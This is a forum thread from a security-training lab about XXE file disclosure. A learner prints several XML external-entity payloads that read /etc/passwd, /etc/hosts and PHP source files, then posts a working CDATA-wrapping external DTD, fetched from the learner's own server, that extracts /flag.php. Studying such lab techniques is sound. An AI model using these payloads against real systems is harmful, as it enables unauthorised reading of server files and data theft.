Have a Problem in XXE Advanced File Disclosure

Hello fam,
I am now having a problem in XXE Advanced File Disclosure!

The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).

My Approach: So I tried CDATA Method as Follow -
I first make an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;"> in my host, after that start my webserver!

I go to the target ip website and start intercepting with burp. As expected, the request go through '/submitDetails.php' with POST Method. So I tried to alter the XML data to perform an XXE attack.

Attampt 1
I include the data,

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

which works as expected.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attampt 2
So I tried for the core feature of CDATA, to get the source php code of submitDetails.php with the following payload.

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

But this doen’t output anything as we expected.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attempt 3
So I tried to check another one, this time another system file, which is /etc/passwd. Superisingly, this doesn’t work either [not like /etc/hosts which worked.].

Attempt 4
OK, I thought may be they limit the file permission or output limit, so I tried basic XXE like following.

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

.
.
.

<email>&example;</email>

But guess what, this work.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attempt 5
I have tried things that I know, but none didn’t work.
Bonus: So I tried to see what the question /flag.php looks like, but it returns a 404 Error, not a 302 or 500.
So I came here to ask for help. May be some glitch in the lab setup? or I am missing some important thing?

Thanks alot. Please Help me solve this puzzle.

Screenshot for attemp 1:

Screenshot for Attempt 2

Screenshot for Attempt 4

[SOLVED]
I research about CDATA all the way and try to alter the method a little. Now all my CDATA tags are in my server. The solution is as follow!
xxe.dtd

<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents 
'%start;%file;%end;'>">

XML Payload

<!DOCTYPE email [
  <!ENTITY % dtd SYSTEM
  "http://10.10.16.10:8000/xxe.dtd">
  %dtd;
  %all;
]>
.
.
.
<email>
&fileContents;
</email>

Thank you, today I found out that researching and reading document is also a good practice when something doesn’t work out.

3 Likes

Thanks this is what I was missing out!

Hello all,

I’m stuck at this point. I was doing lot’s of things but it can’t work !!! I turn around for one week, seriously, wtf I loose my hair in this question… Could you help me because just for find the file flag.php it’s impossible… Or not but how can do it ?
Thanks

Hi guys,

Finaly it works but I think there are lots of prob with the VM… Because all I do today I was doing yesterday. So cool : it works !!! and I learn lots of things.
Thanks

Can someone help me please on this it doesnt work i tried everything . !!!

Its indeed tricky!